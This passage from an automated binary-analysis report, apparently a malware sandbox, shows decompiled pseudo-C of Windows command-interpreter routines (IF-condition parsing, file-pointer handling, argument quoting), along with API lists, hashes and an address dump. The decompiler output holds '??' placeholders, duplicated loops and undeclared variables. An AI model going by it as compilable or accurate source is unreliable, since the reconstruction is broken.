                                                      • LocalFree.KERNEL32(?,?,?), ref: 4A743088
                                                      • _ultoa.MSVCRT ref: 4A747C13
                                                      • GetACP.KERNEL32(?,000000FF,?,00000020), ref: 4A747C28
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000), ref: 4A747C3C
                                                      • FormatMessageW.KERNEL32(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 4A747C75
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                      • String ID: (#$Application$System
                                                      • API String ID: 3377411628-593978566
                                                      • Opcode ID: b5ade3e42e0b7c39598963ab43152b00db6bac2c99649e5f23d645a52bc11946
                                                      • Instruction ID: 7fd1203babbd34076918cc99ae3de0d3b5e719ac60ce4920d4790cd148ff6b91
                                                      • Opcode Fuzzy Hash: b5ade3e42e0b7c39598963ab43152b00db6bac2c99649e5f23d645a52bc11946
                                                      • Instruction Fuzzy Hash: DB318EB2A04208ABDB20DFA1CC49DEEBBBDEB89741F114525F505EB081DB709A08CB20
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 23%
                                                      			E4A736640(int __ebx, void* __edx, void* __edi) {
                                                      				void* _t42;
                                                      				void* _t47;
                                                      				short* _t49;
                                                      				short* _t50;
                                                      				intOrPtr _t54;
                                                      				void* _t57;
                                                      				void* _t60;
                                                      				void* _t73;
                                                      				long _t74;
                                                      				void* _t75;
                                                      				void* _t81;
                                                      				long _t84;
                                                      				void* _t87;
                                                      				void* _t88;
                                                      				void* _t89;
                                                      				void* _t90;
                                                      				short* _t91;
                                                      				void* _t93;
                                                      				intOrPtr* _t94;
                                                      				int _t105;
                                                      				signed int _t107;
                                                      
                                                      				L0:
                                                      				while(1) {
                                                      					L0:
                                                      					_t88 = __edi;
                                                      					_t87 = __edx;
                                                      					_t74 = __ebx;
                                                      					_t42 = E4A7318EB( *((intOrPtr*)(_t107 - 0x210)), 0xa);
                                                      					_t90 = _t42;
                                                      					if(_t90 == __ebx) {
                                                      						goto L27;
                                                      					}
                                                      					L3:
                                                      					E4A73654D( *((intOrPtr*)(_t107 - 0x224)), _t107 - 0x204, 0x80, _t74);
                                                      					_t47 = _t107 - 0x104;
                                                      					__imp___wcsicmp(_t47, _t107 - 0x204);
                                                      					if(_t47 != 0) {
                                                      						L13:
                                                      						_t91 = E4A7318EB(_t90, 0x3a);
                                                      						if(_t91 != _t74) {
                                                      							L23:
                                                      							_t49 = _t91;
                                                      							_t90 = _t91 + 2;
                                                      							while(1) {
                                                      								L9:
                                                      								 *((intOrPtr*)(_t107 - 0x210)) = _t49;
                                                      								if( *_t49 == 0xa) {
                                                      									break;
                                                      								}
                                                      								L7:
                                                      								if(_t49 == 0x4a768640) {
                                                      									break;
                                                      								}
                                                      								L8:
                                                      								_t49 = _t49;
                                                      							}
                                                      							L10:
                                                      							if( *_t49 != 0x3a) {
                                                      								 *((intOrPtr*)(_t107 - 0x210)) = _t49;
                                                      							}
                                                      							L12:
                                                      							_t50 = E4A732B0D(_t49, _t74);
                                                      							 *((intOrPtr*)(_t107 - 0x224)) = _t50;
                                                      							if( *_t50 == 0x3a) {
                                                      								continue;
                                                      							}
                                                      							goto L13;
                                                      						}
                                                      						L14:
                                                      						if( *0x4a7540b8 == 1) {
                                                      							L1:
                                                      							E4A733AB3( *(_t107 - 0x208));
                                                      							_t54 =  *((intOrPtr*)(_t107 - 0x218));
                                                      							_pop(_t89);
                                                      							_pop(_t93);
                                                      							_pop(_t75);
                                                      							return E4A7313A9(_t54, _t75,  *(_t107 - 4) ^ _t107, _t87, _t89, _t93);
                                                      						} else {
                                                      							goto L15;
                                                      						}
                                                      						while(1) {
                                                      							L15:
                                                      							E4A734B2A(_t48);
                                                      							_t94 = __imp___get_osfhandle;
                                                      							_t57 =  *_t94( *(_t107 - 0x208), _t74, _t74, 1);
                                                      							_pop(_t81);
                                                      							_t58 = SetFilePointer(_t57, ??, ??, ??);
                                                      							 *(_t88 + 8) = _t58;
                                                      							if(_t58 >=  *((intOrPtr*)(_t107 - 0x228)) &&  *(_t107 - 0x214) == _t74) {
                                                      							}
                                                      							L24:
                                                      							if( *(_t107 - 0x20c) != _t74) {
                                                      								L29:
                                                      								E4A7357F4(_t58, _t88);
                                                      								L40:
                                                      								 *0x4a7540b4 =  *((intOrPtr*)(_t88 + 0x110));
                                                      								E4A736D44(_t81, 0x400023ab, 1, _t107 - 0x104);
                                                      								 *((intOrPtr*)(_t107 - 0x218)) = 1;
                                                      								goto L1;
                                                      							}
                                                      							L25:
                                                      							if( *(_t107 - 0x214) == _t74) {
                                                      								goto L29;
                                                      							}
                                                      							L26:
                                                      							_t48 = SetFilePointer( *_t94(_t74),  *(_t107 - 0x208), _t74, _t74);
                                                      							 *(_t107 - 0x214) = _t74;
                                                      							while(1) {
                                                      								L15:
                                                      								E4A734B2A(_t48);
                                                      								_t94 = __imp___get_osfhandle;
                                                      								_t57 =  *_t94( *(_t107 - 0x208), _t74, _t74, 1);
                                                      								_pop(_t81);
                                                      								_t58 = SetFilePointer(_t57, ??, ??, ??);
                                                      								 *(_t88 + 8) = _t58;
                                                      								if(_t58 >=  *((intOrPtr*)(_t107 - 0x228)) &&  *(_t107 - 0x214) == _t74) {
                                                      								}
                                                      								goto L17;
                                                      							}
                                                      							goto L24;
                                                      							L17:
                                                      							_t60 =  *_t94( *(_t107 - 0x208), 0x4a768640, 0x200, _t107 - 0x20c);
                                                      							_pop(_t81);
                                                      							_push(_t60);
                                                      							if(E4A7367D3() == 0) {
                                                      								goto L24;
                                                      							}
                                                      							L18:
                                                      							_t58 =  *(_t107 - 0x20c);
                                                      							if(_t58 == _t74) {
                                                      								goto L25;
                                                      							}
                                                      							L19:
                                                      							if(_t58 == 0xffffffff ||  *0x4a768640 == _t74 ||  *((intOrPtr*)(_t107 - 0x104)) == _t74) {
                                                      								goto L24;
                                                      							} else {
                                                      								L22:
                                                      								0x4a768640[_t58] = 0;
                                                      								_t91 = E4A7318EB(0x4a768640, 0x3a);
                                                      								if(_t91 == _t74) {
                                                      									continue;
                                                      								}
                                                      								goto L23;
                                                      							}
                                                      						}
                                                      					}
                                                      					L4:
                                                      					 *0x4a7540b8 =  *( *((intOrPtr*)(_t107 - 0x220)) + 0x40) & 0x00000001;
                                                      					_t48 = E4A73661C();
                                                      					if(_t90 == _t74) {
                                                      						L34:
                                                      						if(_t48 == 0) {
                                                      							L36:
                                                      							_t48 =  *(_t107 - 0x20c);
                                                      							L39:
                                                      							 *(_t88 + 8) =  *(_t88 + 8) + _t48;
                                                      							goto L14;
                                                      						}
                                                      						L35:
                                                      						_push(_t74);
                                                      						_push(_t74);
                                                      						_push(_t74);
                                                      						_push(_t74);
                                                      						_push( *(_t107 - 0x20c));
                                                      						_push(0x4a768640);
                                                      						L38:
                                                      						_t48 = WideCharToMultiByte( *0x4a7541b8, _t74, ??, ??, ??, ??, ??, ??);
                                                      						goto L39;
                                                      					}
                                                      					L5:
                                                      					if(_t48 != 0) {
                                                      						L37:
                                                      						_push(_t74);
                                                      						_push(_t74);
                                                      						_push(_t74);
                                                      						_push(_t74);
                                                      						_push(_t90 - 0x4a768640 + 2 >> 1);
                                                      						_push(0x4a768640);
                                                      						goto L38;
                                                      					}
                                                      					L6:
                                                      					 *(_t88 + 8) =  *(_t88 + 8) + (_t90 - 0x4a768640 + 2 >> 1);
                                                      					goto L14;
                                                      					L27:
                                                      					__imp___get_osfhandle(1);
                                                      					if(SetFilePointer(_t42,  *(_t107 - 0x208), __ebx, __ebx) ==  *((intOrPtr*)(_t107 - 0x21c))) {
                                                      						goto L3;
                                                      					}
                                                      					L28:
                                                      					L30:
                                                      					_t84 =  *(_t107 - 0x20c);
                                                      					if(_t84 == 0x200) {
                                                      						goto L3;
                                                      					}
                                                      					L31:
                                                      					_t105 = _t84 - ( *((intOrPtr*)(_t107 - 0x210)) - 0x4a768640 >> 1);
                                                      					_t73 = E4A73661C();
                                                      					if(_t73 != 0) {
                                                      						_t73 = WideCharToMultiByte( *0x4a7541b8, __ebx, 0x4a768640, _t105, __ebx, __ebx, __ebx, __ebx);
                                                      						_t105 = _t73;
                                                      					}
                                                      					L33:
                                                      					__imp___get_osfhandle(1);
                                                      					_t48 = SetFilePointer(_t73,  *(_t107 - 0x208),  ~_t105, _t74);
                                                      					goto L14;
                                                      				}
                                                      			}

























                                                      APIs
                                                        • Part of subcall function 4A7318EB: wcschr.MSVCRT ref: 4A731900
                                                      • _wcsicmp.MSVCRT ref: 4A73667D
                                                      • _get_osfhandle.MSVCRT ref: 4A73672B
                                                      • SetFilePointer.KERNEL32(00000000), ref: 4A73672F
                                                      • _get_osfhandle.MSVCRT ref: 4A736763
                                                      • _get_osfhandle.MSVCRT ref: 4A7401B7
                                                      • SetFilePointer.KERNEL32(00000000,?,00000001,?,0000000A), ref: 4A7401BF
                                                      • WideCharToMultiByte.KERNEL32(?,4A768640,?,?,?,?,?,?,00000001,?,0000000A), ref: 4A74475D
                                                      • _get_osfhandle.MSVCRT ref: 4A744771
                                                      • SetFilePointer.KERNEL32(00000000,00000001,?,00000001,?,0000000A), ref: 4A744779
                                                      • WideCharToMultiByte.KERNEL32(?,4A768640,?,?,?,?,?,00000001,?,0000000A), ref: 4A7447B9
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _get_osfhandle$FilePointer$ByteCharMultiWide$_wcsicmpwcschr
                                                      • String ID:
                                                      • API String ID: 147692262-0
                                                      • Opcode ID: 8eeac93ef456bb36975cf4ee2eaeae8720c7f93e0633a9b654da678f2fe44a69
                                                      • Instruction ID: 154fcfce560bf44f7e5a49fc994fe079a2974096b758244a8f2a95b80959679b
                                                      • Opcode Fuzzy Hash: 8eeac93ef456bb36975cf4ee2eaeae8720c7f93e0633a9b654da678f2fe44a69
                                                      • Instruction Fuzzy Hash: C051C2B2949629ABDF705B60CCCDBEA7F7DEB012A4F124190E905E6092D7708D89CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 53%
                                                      			E4A73617F(void* __ecx, intOrPtr _a4) {
                                                      				void* __ebp;
                                                      				intOrPtr* _t5;
                                                      				char _t6;
                                                      				intOrPtr _t9;
                                                      				char _t11;
                                                      				char _t12;
                                                      				char _t17;
                                                      				char _t18;
                                                      				intOrPtr* _t19;
                                                      				void* _t21;
                                                      				void* _t27;
                                                      				void* _t32;
                                                      				void* _t35;
                                                      				intOrPtr* _t36;
                                                      
                                                      				_t21 = __ecx;
                                                      				if(E4A731CBF(0) != 0x4000) {
                                                      					E4A74EE72();
                                                      				}
                                                      				_t5 = E4A7329E9(_t21, 0);
                                                      				_t36 = __imp___wcsicmp;
                                                      				_t19 = _t5;
                                                      				_t6 =  *_t36(L"ERRORLEVEL", 0x4a768640, _t32, _t35, _t19);
                                                      				__eflags = _t6;
                                                      				if(_t6 == 0) {
                                                      					 *_t19 = 0x35;
                                                      					goto L2;
                                                      				} else {
                                                      					_t11 =  *_t36(L"EXIST", 0x4a768640);
                                                      					__eflags = _t11;
                                                      					if(_t11 == 0) {
                                                      						 *_t19 = 0x37;
                                                      						L2:
                                                      						_t9 = E4A7322CA(E4A733D56(0), 0, 0);
                                                      						L12:
                                                      						 *((intOrPtr*)(_t19 + 0x3c)) = _t9;
                                                      						L11:
                                                      						return _t19;
                                                      					}
                                                      					__eflags =  *0x4a754081;
                                                      					if( *0x4a754081 == 0) {
                                                      						L9:
                                                      						_t12 =  *_t36("NOT", 0x4a768640);
                                                      						_pop(_t27);
                                                      						__eflags = _t12;
                                                      						if(_t12 == 0) {
                                                      							__eflags = _a4 - _t12;
                                                      							if(_a4 != _t12) {
                                                      								E4A74EE72();
                                                      							}
                                                      							 *_t19 = 0x38;
                                                      							_t9 = E4A73617F(_t27, 1);
                                                      							goto L12;
                                                      						}
                                                      						__eflags = 0;
                                                      						E4A731D26(0, 0, 0, 0);
                                                      						 *_t19 = 0x39;
                                                      						E4A736262(__eflags, _t19);
                                                      						goto L11;
                                                      					}
                                                      					_t17 =  *_t36(L"CMDEXTVERSION", 0x4a768640);
                                                      					__eflags = _t17;
                                                      					if(_t17 == 0) {
                                                      						 *_t19 = 0x34;
                                                      						goto L2;
                                                      					}
                                                      					__eflags =  *0x4a754081;
                                                      					if( *0x4a754081 == 0) {
                                                      						goto L9;
                                                      					}
                                                      					_t18 =  *_t36(L"DEFINED", 0x4a768640);
                                                      					__eflags = _t18;
                                                      					if(_t18 == 0) {
                                                      						goto L1;
                                                      					}
                                                      					goto L9;
                                                      				}
                                                      				L1:
                                                      				 *_t19 = 0x36;
                                                      				goto L2;
                                                      			}


















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _wcsicmp
                                                      • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                      • API String ID: 2081463915-1668778490
                                                      • Opcode ID: 40cba58a28c3dc040b70a60ca8b8aaa03d6ed5c1216430e37e32203bfecb160a
                                                      • Instruction ID: 63a67d1133adfdda93cbe9bc9c7009f91f99872eb5407a1a26d684e28210ce50
                                                      • Opcode Fuzzy Hash: 40cba58a28c3dc040b70a60ca8b8aaa03d6ed5c1216430e37e32203bfecb160a
                                                      • Instruction Fuzzy Hash: 3821D3B151DA62B9FB711BA6DC84F576EDCCB822A0F134067E600CD483DAA5C50CC73A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 90%
                                                      			E4A7514FD(void* __ecx, void* __edx, void* _a4, signed int _a8, intOrPtr _a12, signed int _a15, intOrPtr _a16) {
                                                      				char _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				int _v20;
                                                      				void* _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				char _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				void* _v68;
                                                      				void* _v72;
                                                      				short _v74;
                                                      				short _v76;
                                                      				void* _v80;
                                                      				short _v82;
                                                      				short _v84;
                                                      				void* _v88;
                                                      				short _v90;
                                                      				short _v92;
                                                      				void* _v96;
                                                      				short _v98;
                                                      				short _v100;
                                                      				void* _v104;
                                                      				short _v106;
                                                      				short _v108;
                                                      				void* _v112;
                                                      				short _v114;
                                                      				short _v116;
                                                      				signed int _v120;
                                                      				signed int _v124;
                                                      				signed int _v128;
                                                      				char _v132;
                                                      				void* _t108;
                                                      				int _t118;
                                                      				void* _t121;
                                                      				intOrPtr* _t132;
                                                      				signed int _t135;
                                                      				void* _t137;
                                                      				void* _t138;
                                                      				void* _t139;
                                                      				short _t147;
                                                      				void _t148;
                                                      				long _t151;
                                                      				long _t153;
                                                      				signed int _t154;
                                                      				void* _t158;
                                                      				signed int _t159;
                                                      				intOrPtr _t160;
                                                      				int _t161;
                                                      				int _t163;
                                                      				void* _t165;
                                                      				intOrPtr _t166;
                                                      				intOrPtr* _t169;
                                                      				intOrPtr* _t170;
                                                      				intOrPtr _t171;
                                                      				void* _t174;
                                                      				signed short _t182;
                                                      				void* _t183;
                                                      				intOrPtr* _t184;
                                                      				intOrPtr* _t185;
                                                      				void* _t186;
                                                      				signed short* _t196;
                                                      				signed int _t197;
                                                      				signed int _t199;
                                                      				signed short* _t204;
                                                      				int _t205;
                                                      				intOrPtr _t206;
                                                      				intOrPtr _t207;
                                                      				signed int _t209;
                                                      				void* _t210;
                                                      				void* _t211;
                                                      				short* _t212;
                                                      				intOrPtr _t215;
                                                      				intOrPtr _t216;
                                                      				void* _t218;
                                                      
                                                      				_t183 = __edx;
                                                      				_t165 = __ecx;
                                                      				_v116 = 0;
                                                      				_v114 = 0;
                                                      				_t159 = 0;
                                                      				_v132 = 0;
                                                      				_v128 = 0;
                                                      				_v124 = 0;
                                                      				_v120 = 0;
                                                      				asm("stosd");
                                                      				_v108 = 0;
                                                      				_v106 = 0;
                                                      				asm("stosd");
                                                      				_v100 = 0;
                                                      				_v98 = 0;
                                                      				asm("stosd");
                                                      				_v92 = 0;
                                                      				_v90 = 0;
                                                      				asm("stosd");
                                                      				_v84 = 0;
                                                      				_v82 = 0;
                                                      				asm("stosd");
                                                      				_v76 = 0;
                                                      				_v74 = 0;
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				_v60 = 0;
                                                      				_v56 = 0;
                                                      				_v52 = 0;
                                                      				_v48 = 0;
                                                      				_v44 = 0;
                                                      				_v40 = 0;
                                                      				_v36 = 0;
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				E4A7435BA(0);
                                                      				_t108 = E4A732041(0x2c);
                                                      				_t203 = _t108;
                                                      				 *((intOrPtr*)(_t108 + 8)) = 0x800;
                                                      				_v12 = 0;
                                                      				_t219 = _a12;
                                                      				if(_a12 != 0) {
                                                      					_push(0x10);
                                                      					_pop(0);
                                                      					_v12 = 0;
                                                      				}
                                                      				E4A73B210(_t183, _t219, _a4,  &_v132);
                                                      				_t220 = _v56 - _t159;
                                                      				if(_v56 == _t159 || E4A739662(_t165, _t183, _t220, _v56) == 1 || E4A73A005( &_v132, _t159, 1,  &_v8) == 1 || E4A739AD4(_t183, _v8, _t203, 0, _v12, _t159, _t159, _t159, _t159, _t159, _t159) != 0) {
                                                      					L58:
                                                      					E4A73963C();
                                                      					__eflags = 0;
                                                      					return 0;
                                                      				} else {
                                                      					_t166 = _v8;
                                                      					_t118 =  *(_t166 + 0x14);
                                                      					if(_t118 != _t159) {
                                                      						qsort( *(_t166 + 0x1c), _t118, 4, E4A750BD5);
                                                      						_t218 = _t218 + 0x10;
                                                      					}
                                                      					_t204 = _a4;
                                                      					_t196 = _t204;
                                                      					_a15 = _t159;
                                                      					if(_a8 <= _t159) {
                                                      						L20:
                                                      						 *_t204 = 0;
                                                      						_t205 =  *(_v8 + 0x14);
                                                      						_v20 = _t205;
                                                      						_t121 = calloc(4, _t205);
                                                      						 *0x4a7706c0 = _t121;
                                                      						if(_t121 == _t159) {
                                                      							goto L58;
                                                      						}
                                                      						_t197 = 0;
                                                      						_v12 = 0;
                                                      						_a8 = _t159;
                                                      						if(_t205 <= _t159) {
                                                      							L57:
                                                      							E4A73142E( *((intOrPtr*)(_v8 + 0x18)));
                                                      							E4A73142E( *((intOrPtr*)(_v8 + 4)));
                                                      							E4A73142E(_v8);
                                                      							E4A73963C();
                                                      							return _a8;
                                                      						} else {
                                                      							goto L22;
                                                      						}
                                                      						do {
                                                      							L22:
                                                      							_t132 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x1c)) + _t197 * 4)) + 0x30;
                                                      							_t184 = E4A732EC4;
                                                      							_t169 = _t132;
                                                      							while(1) {
                                                      								_t206 =  *_t169;
                                                      								if(_t206 !=  *_t184) {
                                                      									break;
                                                      								}
                                                      								if(_t206 == _t159) {
                                                      									L27:
                                                      									_t169 = 0;
                                                      									L29:
                                                      									if(_t169 == _t159) {
                                                      										goto L56;
                                                      									}
                                                      									_t185 = E4A732EBC;
                                                      									_t170 = _t132;
                                                      									while(1) {
                                                      										_t207 =  *_t170;
                                                      										if(_t207 !=  *_t185) {
                                                      											break;
                                                      										}
                                                      										if(_t207 == _t159) {
                                                      											L35:
                                                      											_t170 = 0;
                                                      											L37:
                                                      											if(_t170 == _t159) {
                                                      												goto L56;
                                                      											}
                                                      											_t186 = _t132 + 2;
                                                      											do {
                                                      												_t171 =  *_t132;
                                                      												_t132 = _t132 + 2;
                                                      											} while (_t171 != _t159);
                                                      											_t160 = _a16;
                                                      											_t135 = _t132 - _t186 >> 1;
                                                      											_v16 = _t135;
                                                      											_t209 = _a8 << 2;
                                                      											_t137 = calloc(_t135 + _t160 + 4, 2);
                                                      											_t174 =  *0x4a7706c0; // 0x0
                                                      											 *(_t174 + _t209) = _t137;
                                                      											_t138 =  *0x4a7706c0; // 0x0
                                                      											if( *((intOrPtr*)(_t138 + _t209)) == 0) {
                                                      												L55:
                                                      												_t159 = 0;
                                                      												__eflags = 0;
                                                      												goto L56;
                                                      											}
                                                      											if(_a15 != 0) {
                                                      												_t199 = 0;
                                                      												__eflags = 0;
                                                      												L49:
                                                      												__eflags = _a15;
                                                      												_t139 =  *0x4a7706c0; // 0x0
                                                      												_t210 =  *(_t139 + _t209);
                                                      												if(_a15 != 0) {
                                                      													_t148 = 0x22;
                                                      													 *_t210 = _t148;
                                                      													_t210 = _t210 + 2;
                                                      													__eflags = _t210;
                                                      												}
                                                      												_t161 = _t160 + _t160;
                                                      												memcpy(_t210, _a4, _t161);
                                                      												_t211 = _t210 + _t161;
                                                      												_t163 = _v16 + _v16;
                                                      												memcpy(_t211,  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4)) + 0x30, _t163);
                                                      												_t218 = _t218 + 0x18;
                                                      												_t212 = _t211 + _t163;
                                                      												__eflags = _a15;
                                                      												if(_a15 != 0) {
                                                      													_t147 = 0x22;
                                                      													 *_t212 = _t147;
                                                      													_t212 = _t212 + 2;
                                                      													__eflags = _t199;
                                                      													if(_t199 != 0) {
                                                      														_a15 = 0;
                                                      													}
                                                      												}
                                                      												_t94 =  &_a8;
                                                      												 *_t94 = _a8 + 1;
                                                      												__eflags =  *_t94;
                                                      												 *_t212 = 0;
                                                      												goto L55;
                                                      											}
                                                      											_t199 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x1c)) + _t197 * 4)) + 0x30;
                                                      											while(1) {
                                                      												_t151 =  *_t199 & 0x0000ffff;
                                                      												if(_t151 == 0) {
                                                      													goto L49;
                                                      												}
                                                      												if(wcschr(L" &()[]{}^=;!%\'+,`~", _t151) != 0) {
                                                      													_a15 = 1;
                                                      												}
                                                      												_t199 = _t199 + 2;
                                                      											}
                                                      											goto L49;
                                                      										}
                                                      										_t215 =  *((intOrPtr*)(_t170 + 2));
                                                      										_t68 = _t185 + 2; // 0x2e
                                                      										if(_t215 !=  *_t68) {
                                                      											break;
                                                      										}
                                                      										_t170 = _t170 + 4;
                                                      										_t185 = _t185 + 4;
                                                      										if(_t215 != _t159) {
                                                      											continue;
                                                      										}
                                                      										goto L35;
                                                      									}
                                                      									asm("sbb ecx, ecx");
                                                      									asm("sbb ecx, 0xffffffff");
                                                      									goto L37;
                                                      								}
                                                      								_t216 =  *((intOrPtr*)(_t169 + 2));
                                                      								_t66 = _t184 + 2; // 0x5c0000
                                                      								if(_t216 !=  *_t66) {
                                                      									break;
                                                      								}
                                                      								_t169 = _t169 + 4;
                                                      								_t184 = _t184 + 4;
                                                      								if(_t216 != _t159) {
                                                      									continue;
                                                      								}
                                                      								goto L27;
                                                      							}
                                                      							asm("sbb ecx, ecx");
                                                      							asm("sbb ecx, 0xffffffff");
                                                      							goto L29;
                                                      							L56:
                                                      							_t197 = _v12 + 1;
                                                      							__eflags = _t197 - _v20;
                                                      							_v12 = _t197;
                                                      						} while (_t197 < _v20);
                                                      						goto L57;
                                                      					} else {
                                                      						do {
                                                      							_t153 =  *_t196 & 0x0000ffff;
                                                      							if(_t153 == 0) {
                                                      								break;
                                                      							}
                                                      							if(_t153 != 0x22) {
                                                      								_t154 = wcschr(L" &()[]{}^=;!%\'+,`~", _t153);
                                                      								__eflags = _t154;
                                                      								if(_t154 != 0) {
                                                      									_a15 = 1;
                                                      								}
                                                      								 *_t204 =  *_t196;
                                                      								_t204 =  &(_t204[1]);
                                                      								_t196 =  &(_t196[1]);
                                                      								_t159 = _t159 + 2;
                                                      								__eflags = _t159;
                                                      							} else {
                                                      								_t158 = 2;
                                                      								_t159 = _t159 + _t158;
                                                      								_t196 = _t196 + _t158;
                                                      								_a15 = 1;
                                                      								if(_a16 >= _t159 >> 1) {
                                                      									_a16 = _a16 - 1;
                                                      								}
                                                      								if( *_t196 == 0x22) {
                                                      									_t182 = 0x22;
                                                      									 *_t204 = _t182;
                                                      									_t204 = _t204 + _t158;
                                                      									_t196 = _t196 + _t158;
                                                      									_t159 = _t159 + _t158;
                                                      								}
                                                      							}
                                                      						} while (_t159 >> 1 < _a8);
                                                      						_t159 = 0;
                                                      						goto L20;
                                                      					}
                                                      				}
                                                      			}

                                                      0x4a7515a6
                                                      0x4a7515a7
                                                      0x4a7515a7
                                                      0x4a7515b1
                                                      0x4a7515b6
                                                      0x4a7515b9
                                                      0x4a751864
                                                      0x4a751864
                                                      0x4a751869
                                                      0x00000000
                                                      0x4a751604
                                                      0x4a751604
                                                      0x4a751607
                                                      0x4a75160c
                                                      0x4a751619
                                                      0x4a75161f
                                                      0x4a75161f
                                                      0x4a751625
                                                      0x4a751628
                                                      0x4a75162a
                                                      0x4a75162d
                                                      0x4a751695
                                                      0x4a751697
                                                      0x4a75169d
                                                      0x4a7516a3
                                                      0x4a7516a6
                                                      0x4a7516ae
                                                      0x4a7516b5
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7516bb
                                                      0x4a7516bf
                                                      0x4a7516c2
                                                      0x4a7516c5
                                                      0x4a75183c
                                                      0x4a751842
                                                      0x4a75184d
                                                      0x4a751855
                                                      0x4a75185a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7516cb
                                                      0x4a7516cb
                                                      0x4a7516d4
                                                      0x4a7516d7
                                                      0x4a7516dc
                                                      0x4a7516de
                                                      0x4a7516de
                                                      0x4a7516e4
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7516e9
                                                      0x4a751700
                                                      0x4a751700
                                                      0x4a751709
                                                      0x4a75170b
                                                      0x00000000
                                                      0x00000000
                                                      0x4a751711
                                                      0x4a751716
                                                      0x4a751718
                                                      0x4a751718
                                                      0x4a75171e
                                                      0x00000000
                                                      0x00000000
                                                      0x4a751723
                                                      0x4a75173a
                                                      0x4a75173a
                                                      0x4a751743
                                                      0x4a751745
                                                      0x00000000
                                                      0x00000000
                                                      0x4a75174b
                                                      0x4a75174e
                                                      0x4a75174e
                                                      0x4a751752
                                                      0x4a751753
                                                      0x4a751758
                                                      0x4a751760
                                                      0x4a751762
                                                      0x4a75176c
                                                      0x4a75176f
                                                      0x4a751777
                                                      0x4a75177d
                                                      0x4a751780
                                                      0x4a751789
                                                      0x4a75182a
                                                      0x4a75182a
                                                      0x4a75182a
                                                      0x00000000
                                                      0x4a75182a
                                                      0x4a751793
                                                      0x4a7517c5
                                                      0x4a7517c5
                                                      0x4a7517c7
                                                      0x4a7517c7
                                                      0x4a7517cb
                                                      0x4a7517d0
                                                      0x4a7517d3
                                                      0x4a7517d7
                                                      0x4a7517d8
                                                      0x4a7517dc
                                                      0x4a7517dc
                                                      0x4a7517dc
                                                      0x4a7517dd
                                                      0x4a7517e4
                                                      0x4a7517f5
                                                      0x4a7517fa
                                                      0x4a751802
                                                      0x4a751807
                                                      0x4a75180a
                                                      0x4a75180c
                                                      0x4a751810
                                                      0x4a751814
                                                      0x4a751815
                                                      0x4a751819
                                                      0x4a75181a
                                                      0x4a75181c
                                                      0x4a75181e
                                                      0x4a75181e
                                                      0x4a75181c
                                                      0x4a751824
                                                      0x4a751824
                                                      0x4a751824
                                                      0x4a751827
                                                      0x00000000
                                                      0x4a751827
                                                      0x4a75179e
                                                      0x4a7517bb
                                                      0x4a7517bb
                                                      0x4a7517c1
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7517b3
                                                      0x4a7517b5
                                                      0x4a7517b5
                                                      0x4a7517ba
                                                      0x4a7517ba
                                                      0x00000000
                                                      0x4a7517bb
                                                      0x4a751725
                                                      0x4a751729
                                                      0x4a75172d
                                                      0x00000000
                                                      0x00000000
                                                      0x4a75172f
                                                      0x4a751732
                                                      0x4a751738
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a751738
                                                      0x4a75173e
                                                      0x4a751740
                                                      0x00000000
                                                      0x4a751740
                                                      0x4a7516eb
                                                      0x4a7516ef
                                                      0x4a7516f3
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7516f5
                                                      0x4a7516f8
                                                      0x4a7516fe
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7516fe
                                                      0x4a751704
                                                      0x4a751706
                                                      0x00000000
                                                      0x4a75182c
                                                      0x4a75182f
                                                      0x4a751830
                                                      0x4a751833
                                                      0x4a751833
                                                      0x00000000
                                                      0x4a75162f
                                                      0x4a75162f
                                                      0x4a75162f
                                                      0x4a751635
                                                      0x00000000
                                                      0x00000000
                                                      0x4a75163b
                                                      0x4a75166e
                                                      0x4a751676
                                                      0x4a751678
                                                      0x4a75167a
                                                      0x4a75167a
                                                      0x4a751681
                                                      0x4a751685
                                                      0x4a751687
                                                      0x4a751689
                                                      0x4a751689
                                                      0x4a75163d
                                                      0x4a75163f
                                                      0x4a751640
                                                      0x4a751646
                                                      0x4a75164b
                                                      0x4a75164f
                                                      0x4a751651
                                                      0x4a751651
                                                      0x4a751658
                                                      0x4a75165c
                                                      0x4a75165d
                                                      0x4a751660
                                                      0x4a751662
                                                      0x4a751664
                                                      0x4a751664
                                                      0x4a751658
                                                      0x4a75168e
                                                      0x4a751693
                                                      0x00000000
